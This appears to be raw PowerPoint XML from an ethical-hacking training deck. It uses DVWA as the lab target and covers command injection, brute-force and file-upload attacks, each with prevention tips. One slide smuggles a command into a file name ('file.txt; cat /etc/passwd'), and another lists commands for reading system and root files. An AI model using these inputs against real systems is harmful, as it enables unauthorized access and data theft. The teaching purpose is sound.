                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>What if user enters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>file.txt; cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>as the file name?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2371194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C2514-BCA0-7F58-B03B-9212DE52E0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FC13C9A-A777-E48D-8552-862B3DA56B95}"/>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D0DEDAEF-4957-85D6-A52F-6B0A340875D3}"/>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COMMAND INJECTION ATTACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F93A638-DBB0-BF47-C7DC-7725D784B85C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635578" y="1414517"/>
            <a:ext cx="10920844" cy="872034"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="15005D"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>OBJECTIVE:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Ping the DVWA’s IP Address and execute command injection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A2D415F-753C-9F8D-B200-BA81260ED560}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6472979" y="3199275"/>
            <a:ext cx="5083443" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" b="1" dirty="0"/>
              <a:t>Commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" b="1" dirty="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>: list files in the directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" b="1" dirty="0"/>
              <a:t>ls –la /root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>: list all files in root directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" b="1" dirty="0"/>
              <a:t>cat /etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>: display content in /etc/passwd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2326711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COMMAND INJECTION ATTACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C368524-EA78-BE75-3CFD-C0CD82F6877F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635578" y="1479876"/>
            <a:ext cx="10920844" cy="1703030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="15005D"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HOW TO PREVENT COMMAND INJECTION ATTACK:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Perform input validation and sanitization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Use whitelist technique: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only allow specific, safe characters or patterns in input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid shell commands.</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="Breaking down — Command Injections | by goswamiijaya | InfoSec Write-ups">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EBC86BE-5BE5-5C06-03D3-C480D8546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754" y="4179022"/>
            <a:ext cx="3999820" cy="224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58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BRUTE-FORCE ATTACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C368524-EA78-BE75-3CFD-C0CD82F6877F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635578" y="1414517"/>
            <a:ext cx="10920844" cy="2534027"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="15005D"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A brute force attack is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15005D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hacking method that uses trial and error </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to crack passwords, login credentials, and encryption keys. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is a simple yet reliable tactic for gaining unauthorized access to individual accounts and organizations’ systems and networks. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The hacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15005D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tries multiple usernames and passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, often using a computer to test a wide range of combinations, until they find the correct login information.</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2E5E82A-710B-03FB-5FE3-C395430C6D60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123974" y="4249472"/>
            <a:ext cx="8864999" cy="2047418"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3069428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BRUTE-FORCE ATTACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CFB24D3-04EE-69C9-4481-873CE732154B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3678553" y="6243213"/>
            <a:ext cx="8239820" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Simple wordlist: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" b="1" dirty="0"/>
              <a:t>github.com/eyesoul216</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C368524-EA78-BE75-3CFD-C0CD82F6877F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635578" y="1414517"/>
            <a:ext cx="10920844" cy="872034"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="15005D"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>OBJECTIVE:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Brute force the login page for every security level: LOW, MEDIUM, HIGH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Brute force attack definition, analogy, and examples: Security word of the  week - Spiceworks Originals - Spiceworks Community">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C88F701C-F74D-088A-63E4-DA9E0DE1E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048" y="3185915"/>
            <a:ext cx="3236505" cy="242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054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pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Picture 2" descr="Why Businesses Need Ethical Hackers | Certified Ethical Hacking">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C12AEE3-0BA6-8EBA-B1C2-C64E32DA9163}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="35000"/>
            <a:duotone>
              <a:prstClr val="black"/>
              <a:schemeClr val="accent3">
                <a:tint val="45000"/>
                <a:satMod val="400000"/>
              </a:schemeClr>
            </a:duotone>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0" name="Subtitle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52FCCD9A-93E6-AD54-BAAE-09D29FFFABB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="773152" y="3602450"/>
            <a:ext cx="11142040" cy="256974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MY" dirty="0"/>
              <a:t>Any actions and or activities related to the material contained within this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TRAINING</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> is solely your responsibility. The misuse of the information in this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TRAINING</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> can result in criminal charges brought against the persons in question. We will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TRAINING</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> to break the law.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Picture 40" descr="http://3.bp.blogspot.com/-3j1wrWhsDI0/VhSYrwQSqiI/AAAAAAAAClc/1U5gYZNhMro/s1600/500px-Disclaimer.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F3AFDFB-42B8-C5E0-AB40-7169801591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4075" y="302907"/>
            <a:ext cx="2863850" cy="238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6494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BRUTE-FORCE ATTACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C368524-EA78-BE75-3CFD-C0CD82F6877F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635578" y="1479876"/>
            <a:ext cx="10920844" cy="1703030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="15005D"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HOW TO PREVENT BRUTE-FORCE ATTACK:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Increase password complexity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Limit login attempts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Implement CAPTCHA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3109566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9ED0B-0DD3-1F31-3E57-6C2DEFA9FA2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270EAA2-AEEA-3ADE-DE83-A36D60B593A3}"/>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AD32CB87-ECA2-C6A0-D2BF-044AE8D8AE3D}"/>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FILE UPLOAD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D96541B9-D0B7-674A-A36F-7C34DDA2F62C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="843922" y="1364129"/>
            <a:ext cx="10920844" cy="3365024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="15005D"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>file upload vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> occurs when a web application allows users to upload files without properly validating or sanitizing the file's contents and type.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can lead to serious security risks, such as remote code execution, information disclosure, or even complete server compromise. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers can exploit such vulnerabilities by uploading malicious files, such as web shells, scripts, or executables, which they can later execute or access.</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2310519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055D-40AB-FE5A-585E-F332E9F2E6A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A24885D-EBB4-7AD8-194D-01FC64C7A2AD}"/>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14168E92-1EA4-08D9-F25C-8E11EDBCF315}"/>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FILE UPLOAD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7797E36-D489-46E0-380E-2E0F614F6FDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635578" y="1479876"/>
            <a:ext cx="10920844" cy="2949525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="15005D"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HOW TO PREVENT FILE UPLOAD:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Validate File Types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Limit File Size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Rename Uploaded Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Store Files Outside of Web Root</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
